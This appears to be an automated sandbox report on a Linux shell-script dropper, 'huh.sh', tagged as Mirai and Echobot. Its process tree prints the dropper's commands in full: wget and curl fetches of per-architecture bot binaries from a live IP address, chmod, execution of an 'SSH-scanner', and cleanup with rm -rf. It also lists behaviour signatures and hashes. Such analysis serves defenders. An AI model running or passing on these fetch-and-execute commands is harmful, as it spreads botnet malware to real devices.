Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
125s -
max time network
153s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
30/12/2024, 07:14
Static task
static1
Behavioral task
behavioral1
Sample
huh.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
huh.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
huh.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
huh.sh
-
Size
3KB
-
MD5
05f3e94487bf02c65f08cbed72943ce0
-
SHA1
db0a369df0887febacb3800f4c6f0b81a1f68351
-
SHA256
ec46f105b049d6674acbf45639883623f2f1cb3eed50eedb4b0e25a27a7b67e2
-
SHA512
bff1d19601df17262771b83212db7a2955bf0882637fc2482e26625a09d294e3f46198049307f4fd2c9f46079b5c4eead5ed0ed0d2db2e33dfb14164ef1f6ac3
Malware Config
Signatures
-
Detected Echobot 5 IoCs
resource yara_rule behavioral4/files/fstream-1.dat family_echobot behavioral4/files/fstream-4.dat family_echobot behavioral4/files/fstream-5.dat family_echobot behavioral4/files/fstream-6.dat family_echobot behavioral4/files/fstream-8.dat family_echobot -
Echobot family
-
Mirai family
-
Contacts a large (139057) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 819 chmod 897 chmod 736 chmod 876 chmod 911 chmod 926 chmod 932 chmod 869 chmod 743 chmod 786 chmod 810 chmod 837 chmod 887 chmod 904 chmod 917 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/SSH-scanner 737 SSH-scanner /tmp/SSH-scanner 744 SSH-scanner /tmp/SSH-scanner 788 SSH-scanner /tmp/SSH-scanner 811 SSH-scanner /tmp/SSH-scanner 820 SSH-scanner /tmp/SSH-scanner 838 SSH-scanner /tmp/SSH-scanner 870 SSH-scanner /tmp/SSH-scanner 877 SSH-scanner /tmp/SSH-scanner 888 SSH-scanner /tmp/SSH-scanner 898 SSH-scanner /tmp/SSH-scanner 905 SSH-scanner /tmp/SSH-scanner 912 SSH-scanner /tmp/SSH-scanner 918 SSH-scanner /tmp/SSH-scanner 927 SSH-scanner /tmp/SSH-scanner 933 SSH-scanner -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog SSH-scanner File opened for modification /dev/misc/watchdog SSH-scanner -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp SSH-scanner -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself gh1fdkak1pdk11neg1f 788 SSH-scanner -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp SSH-scanner -
description ioc Process File opened for reading /proc/433/exe SSH-scanner File opened for reading /proc/865/exe SSH-scanner File opened for reading /proc/892/exe SSH-scanner File opened for reading /proc/882/exe SSH-scanner File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/790/exe SSH-scanner File opened for reading /proc/702/exe SSH-scanner File opened for reading /proc/708/exe SSH-scanner File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/815/exe SSH-scanner File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/797/exe SSH-scanner File opened for reading /proc/699/exe SSH-scanner File opened for reading /proc/783/exe SSH-scanner File opened for reading /proc/805/exe SSH-scanner File opened for reading /proc/831/exe SSH-scanner File opened for reading /proc/864/exe SSH-scanner File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/673/exe SSH-scanner File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/674/exe SSH-scanner File opened for reading /proc/675/exe SSH-scanner File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/893/exe SSH-scanner File opened for reading /proc/701/exe SSH-scanner File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/779/exe SSH-scanner File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/915/exe SSH-scanner File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/665/exe SSH-scanner File opened for reading /proc/700/exe SSH-scanner File opened for reading /proc/874/exe SSH-scanner File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 740 wget 741 curl 742 cat 746 rm 935 wget 936 curl -
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/vcimanagement.mpsl wget File opened for modification /tmp/vcimanagement.arm wget File opened for modification /tmp/vcimanagement.arm6 wget File opened for modification /tmp/vcimanagement.arm7 wget File opened for modification /tmp/vcimanagement.ppc wget File opened for modification /tmp/vcimanagement.x86 wget File opened for modification /tmp/vcimanagement.x86 curl File opened for modification /tmp/vcimanagement.mips curl File opened for modification /tmp/vcimanagement.m68k wget File opened for modification /tmp/vcimanagement.arm5 wget File opened for modification /tmp/vcimanagement.arm6 curl File opened for modification /tmp/vcimanagement.ppc curl File opened for modification /tmp/vcimanagement.sh4 wget File opened for modification /tmp/vcimanagement.i686 curl File opened for modification /tmp/SSH-scanner huh.sh File opened for modification /tmp/vcimanagement.mips wget File opened for modification /tmp/vcimanagement.arm curl File opened for modification /tmp/vcimanagement.i486 curl File opened for modification /tmp/vcimanagement.spc curl File opened for modification /tmp/vcimanagement.sh4 curl File opened for modification /tmp/vcimanagement.spc wget File opened for modification /tmp/vcimanagement.arc curl File opened for modification /tmp/vcimanagement.x86_64 curl File opened for modification /tmp/vcimanagement.mpsl curl File opened for modification /tmp/vcimanagement.arm5 curl File opened for modification /tmp/vcimanagement.m68k curl
Processes
-
/tmp/huh.sh/tmp/huh.sh1⤵
- Writes file to tmp directory
PID:702 -
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.x862⤵
- Writes file to tmp directory
PID:704
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/catcat vcimanagement.x862⤵PID:731
-
-
/bin/chmodchmod +x SSH-scanner huh.sh vcimanagement.x862⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm -rf SSH-scanner huh.sh vcimanagement.x862⤵PID:739
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:740
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/bin/catcat vcimanagement.mips2⤵
- System Network Configuration Discovery
PID:742
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.mips2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.mips2⤵
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.mpsl2⤵
- Writes file to tmp directory
PID:747
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:772
-
-
/bin/catcat vcimanagement.mpsl2⤵PID:784
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.mpsl2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:788
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.mpsl2⤵PID:793
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.arm2⤵
- Writes file to tmp directory
PID:800
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/catcat vcimanagement.arm2⤵PID:809
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.arm2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.arm2⤵PID:813
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.arm52⤵
- Writes file to tmp directory
PID:814
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/catcat vcimanagement.arm52⤵PID:818
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.arm52⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.arm52⤵PID:822
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.arm62⤵
- Writes file to tmp directory
PID:823
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/catcat vcimanagement.arm62⤵PID:835
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.arm62⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.arm62⤵PID:840
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.arm72⤵
- Writes file to tmp directory
PID:841
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.arm72⤵
- Reads runtime system information
PID:864
-
-
/bin/catcat vcimanagement.arm72⤵PID:868
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.arm72⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.arm72⤵PID:872
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.ppc2⤵
- Writes file to tmp directory
PID:873
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/catcat vcimanagement.ppc2⤵PID:875
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.ppc2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.ppc2⤵PID:879
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.m68k2⤵
- Writes file to tmp directory
PID:880
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/catcat vcimanagement.m68k2⤵PID:886
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.m68k2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.m68k2⤵PID:890
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.sh42⤵
- Writes file to tmp directory
PID:891
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/catcat vcimanagement.sh42⤵PID:896
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.sh42⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.sh42⤵PID:900
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.spc2⤵
- Writes file to tmp directory
PID:901
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/catcat vcimanagement.spc2⤵PID:903
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.spc2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.spc2⤵PID:907
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.arc2⤵PID:908
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/catcat vcimanagement.arc2⤵PID:910
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.arc2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:912
-
-
/bin/sh/bin/sh ./SSH-scanner2⤵PID:912
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.arc2⤵PID:913
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.x86_642⤵PID:914
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/catcat vcimanagement.x86_642⤵PID:916
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.x86_642⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:918
-
-
/bin/sh/bin/sh ./SSH-scanner2⤵PID:918
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.x86_642⤵PID:919
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.i6862⤵PID:920
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/catcat vcimanagement.i6862⤵PID:925
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.i6862⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:927
-
-
/bin/sh/bin/sh ./SSH-scanner2⤵PID:927
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.i6862⤵PID:928
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.i4862⤵PID:929
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.i4862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/catcat vcimanagement.i4862⤵PID:931
-
-
/bin/chmodchmod +x SSH-scanner vcimanagement.i4862⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/SSH-scanner./SSH-scanner2⤵
- Executes dropped EXE
PID:933
-
-
/bin/sh/bin/sh ./SSH-scanner2⤵PID:933
-
-
/bin/rmrm -rf SSH-scanner vcimanagement.i4862⤵PID:934
-
-
/usr/bin/wgetwget http://92.118.56.203/bins/vcimanagement.mips642⤵
- System Network Configuration Discovery
PID:935
-
-
/usr/bin/curlcurl -O http://92.118.56.203/bins/vcimanagement.mips642⤵
- System Network Configuration Discovery
PID:936
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
87KB
MD5e1d2b07cc74796f701ee2c7da4114520
SHA1fc8dfac8b167a3308956e2d2b466774e857f73dc
SHA25660f470aa3dec775781e35838c3ee224e5a4697d6169713fb8d1b2e95f8f5e1dd
SHA512d3dc7c67cd604767f0066c7e9fdf7c19abf0c1f4634d32d778f36f89cafcbaaede486f59ac9c62433f05a117e88e552545aedaac399a1f8c46ff43c8562c717f
-
Filesize
90KB
MD5ab51b12ba18669bd5ca11a200c127117
SHA17ce4a0c8183ffdffa477fd2dcd77bc9381d14476
SHA2564954ee06d2e03a9519fa80beca52dcc4897c3162f70463106af4771f13e95f58
SHA512464d909c68287ff37e2f9d52dc412e42ce894267f3c718f68a6e625e812956889cc37c16e9d909ae431a831226a5e5b6cf217396db7b16d706a40d7e3169e0ab
-
Filesize
70KB
MD5a27f3dae35b0f8d557ed9a04b8fc72ab
SHA1fe3093c25cab4b318aed07ffb7e8ee3b0b7e56a0
SHA25644d1974dc0dcf7ce07da8b58c25844513ef7dd148e570e7601d61ddf740cade3
SHA51222f77b88577315654240bdfbef3924eb2cfb763cb27bec1af1506fd4e3550eca77f111251a11dd4fd0d76d035febed6c66e77ee54d8d79531e8bba3e76f0f1f9
-
Filesize
50KB
MD5212f1abc7ac3043dbd2f9042fd82fd2b
SHA151127c4fa36189a94398ed4cef03c155ee210d86
SHA256d9f599fa80b068ad77f18d7ff2793a1bd68b45555091a2985d04cb2316c6272c
SHA5120241e425bb688bb315ae4f18c90f33b195219f493dfc92548b8a49441a6aaa964ede8dad30cb02b8bdb75380b0ecb92d954c1bf02a5667cb00be788ce66a6cac
-
Filesize
142KB
MD562bccd72e7a0de6c1113dddfca73ef79
SHA1181102c0613d62b94cd04b0adf32f780036b568a
SHA2562a91bac7d2e2e93b22190178df4d3c04885c296751cd133edf2b311e46fbe8be
SHA5124a4d14f3db9918518128b26f9b63cf2a1cb54637771873b8284e274af7bae0125ee07ea36f4c9aca37a182bf004b6695b4ce74c6f5458404430313086d761343
-
Filesize
60KB
MD53c2a41675e076c76114cc43d3b6a3281
SHA12375b82a8cfcdc11c929d8d2f6a6a2f81fd8819a
SHA256a0ea4d426ed6e804a64518998b09c24dbaab6b61ba6fb3e4dcdf080c258ea8fc
SHA51207ea2aa38065eac7ccb6082b6924d5e147133a767de395470e7b8df567320fad2688d57bf59be40c19ea5abc551b1b6979d71bc892c0258bd13a715a6b49d9a4